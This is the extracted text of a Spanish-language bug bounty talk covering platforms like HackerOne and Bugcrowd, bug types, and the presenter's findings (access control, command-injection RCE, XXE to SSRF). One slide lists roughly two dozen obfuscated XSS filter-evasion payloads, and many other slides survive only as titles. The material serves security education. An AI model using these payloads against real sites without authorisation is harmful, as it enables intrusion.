The document discusses bug bounty programs, highlighting platforms like HackerOne and Bugcrowd, which reward individuals for reporting software vulnerabilities. It lists various types of errors, including XSS and command injection, and emphasizes the importance of perseverance in bug hunting. The content also shares examples of exploit payloads and bug-related experiences from meetups.

1. Bug Bounty
Experiences

2. Whoami
:~$debsec
• Eduardo Zamorano
• Twitter: @deb_security
• Telegram: https://t.me/bugbountyes
• Youtube: https://www.youtube.com/channel/UC2yIB0Ubc820gNINPjdzF9w
• HackerOne: https://hackerone.com/debsec
• Cobalt: https://app.cobalt.io/debsec
• Bugcrowd: https://bugcrowd.com/debsec
• OpenBugBounty: https://www.openbugbounty.org/researchers/debsec
• Vulnscope: https://www.vulnscope.com/deb_security

3. Agenda
• Bug Bounty
• Plataformas
• Tipos de errores
• Tipos de programas
• OpenBugBounty
• Bugcrowd
• HackerOne
• Bugs

4. QueeselBugBounty
Un programa de recompensas de errores es
un acuerdo ofrecido por muchos sitios web
, organizaciones y desarrolladores de
software por el cual las personas pueden re
cibir reconocimiento y compensación por in
formar errores.

5. Plataformas

6. Tipos de errores

7. Tiposdeprogramas
Públicos
https://www.hackerone.com/resources/e-book/top-10-bounty-programs-2020

8. Tiposdeprogramas
Privados

10. XSS – Open redirect – CSRF – ImproperAccess Control – PII Exposure
https://www.openbugbounty.org/bugbounty-list/
860 Programas

11. Opción#1Payloads XSS
"><img src=x onerror=prompt(1)>
"><img src=xonerror=alert(1)>
"><svg/onload=alert('1')>
"><audioonloadstart=confirm(1) </src>
'onmouseover='alert(1);
"onmouseover="alert(1);
"><object data='data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+'>
<svg/onload=alert('xss');>
"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
%22%20autofocus%20onfocus=alert%60debsec%60%20
%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E
%22%3E%3Csvg/onload=alert('X-S-S')%3E
%22%3E%3Csvg%2Fonload%3Dalert(%27DEBSEC%27)%3E
%22%3E%3Csvg%3E%3Cscript%3E/%3C@/%3Eprompt(/debsec/)%3C/script%3E
%22%27--!%3E%3C/Title/%3C/Style/%3C/Script/%3C/c/%3C/Noscript/%3C/Pre/%3C/Xmp%3E%3CBody/OnPageShow=confirm(/debsec/)%3E
'><iframe/onload=alert(document.domain)></iframe>
'"--!><Body/Onpageshow=confirm`1`>
%3C/script%3E%22%3E%3Cscript%3Eprompt(1)%3C/script%3E
"><svg%2Fonload%3D"alert('debsec')">
%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert%28String.fromCharCode%2888,%2083,%2083,%2080,%2079,%2083,%2069,%2068%29%29%3C/script%3E
%3C%2Fscript%3E%3Cscript%3Ealert%28%27debsec%27%29%3C%2Fscript%3E
%3Csvg/onload=alert%28/debsec/%29%3E
"></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>
--></title></script></iframe></style></textarea></span><svg/onload=alert(String.fromCharCode(49))>
"><svg><script>/<@/>prompt(/debsec/)</script>

12. Opción#2

13. Opción#2

15. Meetup #1
https://twitter.com/saamux

17. https://hackerone.com/hacktivity

18. Meetup #2
https://twitter.com/saamux

19. Meetup #2
https://twitter.com/saamux

20. Meetup #2
https://twitter.com/saamux

21. Bugs
Improper access control

22. Bugs
Improper access control

23. Bugs
Improper access control

24. Bugs
Improper access control

25. Bugs
Unauthenticated RCE via command injection in filename parameter

26. Bugs
Unauthenticated RCE via command injection in filename parameter

27. Bugs
Unauthenticated RCE via command injection in filename parameter

28. Bugs
Unauthenticated RCE via command injection in filename parameter

29. Bugs
Unauthenticated RCE via command injection in filename parameter

30. Bugs
XXE to SSRF AWS private key
unzip file.docx
vi word/document.xml

31. Bugs
XXE to SSRF AWS private key

32. Los invito a ser perseverantes, el entrenamiento lateral no
es mecánico ni menos estructurado, un bug hunter debe
estar preparado para manejar la frustración en todo
momento.